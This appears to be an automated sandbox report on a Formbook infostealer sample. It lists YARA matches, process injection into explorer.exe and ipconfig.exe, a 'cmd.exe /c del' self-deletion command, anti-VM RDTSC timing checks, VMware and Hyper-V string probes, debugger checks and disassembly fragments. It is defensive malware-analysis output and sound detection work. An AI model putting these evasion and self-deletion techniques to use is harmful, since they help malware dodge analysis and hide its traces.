          Source: 00000001.00000001.339035509.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.339035509.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/0@16/8
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6760:120:WilError_01
          Source: v8kZUFgdD4.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: v8kZUFgdD4.exeVirustotal: Detection: 38%
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeFile read: C:\Users\user\Desktop\v8kZUFgdD4.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\v8kZUFgdD4.exe 'C:\Users\user\Desktop\v8kZUFgdD4.exe'
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeProcess created: C:\Users\user\Desktop\v8kZUFgdD4.exe 'C:\Users\user\Desktop\v8kZUFgdD4.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\v8kZUFgdD4.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeProcess created: C:\Users\user\Desktop\v8kZUFgdD4.exe 'C:\Users\user\Desktop\v8kZUFgdD4.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\v8kZUFgdD4.exe'Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32Jump to behavior
          Source: Binary string: ipconfig.pdb source: v8kZUFgdD4.exe, 00000001.00000002.389856707.0000000000A20000.00000040.00000001.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: v8kZUFgdD4.exe, 00000001.00000002.389856707.0000000000A20000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.363215324.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: v8kZUFgdD4.exe, 00000000.00000003.338578386.0000000002500000.00000004.00000001.sdmp, v8kZUFgdD4.exe, 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, ipconfig.exe, 00000007.00000002.599975463.0000000003590000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: v8kZUFgdD4.exe, ipconfig.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.363215324.000000000DC20000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeUnpacked PE file: 1.2.v8kZUFgdD4.exe.400000.0.unpack .text:ER;.rdata:R;.data:W; vs .text:ER;
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 0_2_00403DDB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00403DDB
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_004062F6 pushfd ; ret 1_2_004062F7
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_0041B3C5 push eax; ret 1_2_0041B418
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_004153FC push eax; retf 1_2_0041540B
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_0041B47C push eax; ret 1_2_0041B482
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_0041B412 push eax; ret 1_2_0041B418
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_0041B41B push eax; ret 1_2_0041B482
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00415CE7 pushad ; ret 1_2_00415D4B
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_0041C4EE push 133511A3h; retf 1_2_0041C4F3
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00414D71 push ss; iretd 1_2_00414D72
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00415D38 pushad ; ret 1_2_00415D4B
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00AAD0D1 push ecx; ret 1_2_00AAD0E4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0360D0D1 push ecx; ret 7_2_0360D0E4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00EA62F6 pushfd ; ret 7_2_00EA62F7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00EB53FC push eax; retf 7_2_00EB540B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00EBB3C5 push eax; ret 7_2_00EBB418
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00EBC4EE push 133511A3h; retf 7_2_00EBC4F3
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00EB5CE7 pushad ; ret 7_2_00EB5D4B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00EBB47C push eax; ret 7_2_00EBB482
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00EBB41B push eax; ret 7_2_00EBB482
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00EBB412 push eax; ret 7_2_00EBB418
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00EB4D71 push ss; iretd 7_2_00EB4D72
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00EB5D38 pushad ; ret 7_2_00EB5D4B

          Persistence and Installation Behavior:

          barindex
          Uses ipconfig to lookup or modify the Windows network settingsShow sources
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeRDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 0000000000EA85F4 second address: 0000000000EA85FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 0000000000EA898E second address: 0000000000EA8994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_004088C0 rdtsc 1_2_004088C0
          Source: C:\Windows\explorer.exe TID: 1536Thread sleep time: -45000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exe TID: 6904Thread sleep time: -40000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
          Source: explorer.exe, 00000005.00000000.359549772.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.359510454.00000000083E9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000005.00000000.359944939.000000000868E000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.379240198.00000000045BE000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.355349933.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.354289488.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000005.00000000.359510454.00000000083E9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000005.00000000.355349933.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.359378220.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000005.00000000.354289488.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.354289488.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000005.00000000.359378220.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000005.00000000.359549772.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000005.00000000.343561590.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: explorer.exe, 00000005.00000000.354289488.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_004088C0 rdtsc 1_2_004088C0
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00409B30 LdrLoadDll,1_2_00409B30
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 0_2_00403DDB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00403DDB
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 0_2_021C06DA mov eax, dword ptr fs:[00000030h]0_2_021C06DA
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 0_2_021C0A1C mov eax, dword ptr fs:[00000030h]0_2_021C0A1C
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 0_2_021C09DE mov eax, dword ptr fs:[00000030h]0_2_021C09DE
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 0_2_021C099F mov eax, dword ptr fs:[00000030h]0_2_021C099F
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 0_2_021C08EE mov eax, dword ptr fs:[00000030h]0_2_021C08EE
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A990AF mov eax, dword ptr fs:[00000030h]1_2_00A990AF
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A820A0 mov eax, dword ptr fs:[00000030h]1_2_00A820A0
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A820A0 mov eax, dword ptr fs:[00000030h]1_2_00A820A0
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A820A0 mov eax, dword ptr fs:[00000030h]1_2_00A820A0
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A820A0 mov eax, dword ptr fs:[00000030h]1_2_00A820A0
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A820A0 mov eax, dword ptr fs:[00000030h]1_2_00A820A0
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A820A0 mov eax, dword ptr fs:[00000030h]1_2_00A820A0
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A8F0BF mov ecx, dword ptr fs:[00000030h]1_2_00A8F0BF
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A8F0BF mov eax, dword ptr fs:[00000030h]1_2_00A8F0BF
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A8F0BF mov eax, dword ptr fs:[00000030h]1_2_00A8F0BF
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A59080 mov eax, dword ptr fs:[00000030h]1_2_00A59080
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00AD3884 mov eax, dword ptr fs:[00000030h]1_2_00AD3884
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00AD3884 mov eax, dword ptr fs:[00000030h]1_2_00AD3884
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A558EC mov eax, dword ptr fs:[00000030h]1_2_00A558EC
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00AEB8D0 mov eax, dword ptr fs:[00000030h]1_2_00AEB8D0
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00AEB8D0 mov ecx, dword ptr fs:[00000030h]1_2_00AEB8D0
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00AEB8D0 mov eax, dword ptr fs:[00000030h]1_2_00AEB8D0
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00AEB8D0 mov eax, dword ptr fs:[00000030h]1_2_00AEB8D0
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00AEB8D0 mov eax, dword ptr fs:[00000030h]1_2_00AEB8D0
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00AEB8D0 mov eax, dword ptr fs:[00000030h]1_2_00AEB8D0
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A8002D mov eax, dword ptr fs:[00000030h]1_2_00A8002D
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A8002D mov eax, dword ptr fs:[00000030h]1_2_00A8002D
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A8002D mov eax, dword ptr fs:[00000030h]1_2_00A8002D
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A8002D mov eax, dword ptr fs:[00000030h]1_2_00A8002D
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A8002D mov eax, dword ptr fs:[00000030h]1_2_00A8002D
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A6B02A mov eax, dword ptr fs:[00000030h]1_2_00A6B02A
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A6B02A mov eax, dword ptr fs:[00000030h]1_2_00A6B02A
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A6B02A mov eax, dword ptr fs:[00000030h]1_2_00A6B02A
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A6B02A mov eax, dword ptr fs:[00000030h]1_2_00A6B02A
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00B24015 mov eax, dword ptr fs:[00000030h]1_2_00B24015
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00B24015 mov eax, dword ptr fs:[00000030h]1_2_00B24015
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00AD7016 mov eax, dword ptr fs:[00000030h]1_2_00AD7016
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00AD7016 mov eax, dword ptr fs:[00000030h]1_2_00AD7016
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00AD7016 mov eax, dword ptr fs:[00000030h]1_2_00AD7016
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00B12073 mov eax, dword ptr fs:[00000030h]1_2_00B12073
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00B21074 mov eax, dword ptr fs:[00000030h]1_2_00B21074
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A70050 mov eax, dword ptr fs:[00000030h]1_2_00A70050
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A70050 mov eax, dword ptr fs:[00000030h]1_2_00A70050
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A861A0 mov eax, dword ptr fs:[00000030h]1_2_00A861A0
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A861A0 mov eax, dword ptr fs:[00000030h]1_2_00A861A0
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00AD69A6 mov eax, dword ptr fs:[00000030h]1_2_00AD69A6
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00AD51BE mov eax, dword ptr fs:[00000030h]1_2_00AD51BE
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00AD51BE mov eax, dword ptr fs:[00000030h]1_2_00AD51BE
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00AD51BE mov eax, dword ptr fs:[00000030h]1_2_00AD51BE
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00AD51BE mov eax, dword ptr fs:[00000030h]1_2_00AD51BE
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A7C182 mov eax, dword ptr fs:[00000030h]1_2_00A7C182
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A8A185 mov eax, dword ptr fs:[00000030h]1_2_00A8A185
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A82990 mov eax, dword ptr fs:[00000030h]1_2_00A82990
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A5B1E1 mov eax, dword ptr fs:[00000030h]1_2_00A5B1E1
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A5B1E1 mov eax, dword ptr fs:[00000030h]1_2_00A5B1E1
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A5B1E1 mov eax, dword ptr fs:[00000030h]1_2_00A5B1E1
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00AE41E8 mov eax, dword ptr fs:[00000030h]1_2_00AE41E8
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A74120 mov eax, dword ptr fs:[00000030h]1_2_00A74120
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A74120 mov eax, dword ptr fs:[00000030h]1_2_00A74120
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A74120 mov eax, dword ptr fs:[00000030h]1_2_00A74120
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A74120 mov eax, dword ptr fs:[00000030h]1_2_00A74120
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A74120 mov ecx, dword ptr fs:[00000030h]1_2_00A74120
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A8513A mov eax, dword ptr fs:[00000030h]1_2_00A8513A
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A8513A mov eax, dword ptr fs:[00000030h]1_2_00A8513A
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A59100 mov eax, dword ptr fs:[00000030h]1_2_00A59100
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A59100 mov eax, dword ptr fs:[00000030h]1_2_00A59100
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A59100 mov eax, dword ptr fs:[00000030h]1_2_00A59100
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A5C962 mov eax, dword ptr fs:[00000030h]1_2_00A5C962
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A5B171 mov eax, dword ptr fs:[00000030h]1_2_00A5B171
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A5B171 mov eax, dword ptr fs:[00000030h]1_2_00A5B171
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A7B944 mov eax, dword ptr fs:[00000030h]1_2_00A7B944
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A7B944 mov eax, dword ptr fs:[00000030h]1_2_00A7B944
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A552A5 mov eax, dword ptr fs:[00000030h]1_2_00A552A5
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A552A5 mov eax, dword ptr fs:[00000030h]1_2_00A552A5
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A552A5 mov eax, dword ptr fs:[00000030h]1_2_00A552A5
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A552A5 mov eax, dword ptr fs:[00000030h]1_2_00A552A5
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A552A5 mov eax, dword ptr fs:[00000030h]1_2_00A552A5
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A6AAB0 mov eax, dword ptr fs:[00000030h]1_2_00A6AAB0
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A6AAB0 mov eax, dword ptr fs:[00000030h]1_2_00A6AAB0
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A8FAB0 mov eax, dword ptr fs:[00000030h]1_2_00A8FAB0
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A8D294 mov eax, dword ptr fs:[00000030h]1_2_00A8D294
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A8D294 mov eax, dword ptr fs:[00000030h]1_2_00A8D294
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A82AE4 mov eax, dword ptr fs:[00000030h]1_2_00A82AE4
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A82ACB mov eax, dword ptr fs:[00000030h]1_2_00A82ACB
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A94A2C mov eax, dword ptr fs:[00000030h]1_2_00A94A2C
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A94A2C mov eax, dword ptr fs:[00000030h]1_2_00A94A2C
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A68A0A mov eax, dword ptr fs:[00000030h]1_2_00A68A0A
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A5AA16 mov eax, dword ptr fs:[00000030h]1_2_00A5AA16
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A5AA16 mov eax, dword ptr fs:[00000030h]1_2_00A5AA16
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A55210 mov eax, dword ptr fs:[00000030h]1_2_00A55210
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A55210 mov ecx, dword ptr fs:[00000030h]1_2_00A55210
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A55210 mov eax, dword ptr fs:[00000030h]1_2_00A55210
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A55210 mov eax, dword ptr fs:[00000030h]1_2_00A55210
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeCode function: 1_2_00A73A1C mov eax, dword ptr fs:[00000030h]1_2_00A73A1C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03688F6A mov eax, dword ptr fs:[00000030h]7_2_03688F6A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035BF358 mov eax, dword ptr fs:[00000030h]7_2_035BF358
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035BDB40 mov eax, dword ptr fs:[00000030h]7_2_035BDB40
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035CEF40 mov eax, dword ptr fs:[00000030h]7_2_035CEF40
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E3B7A mov eax, dword ptr fs:[00000030h]7_2_035E3B7A
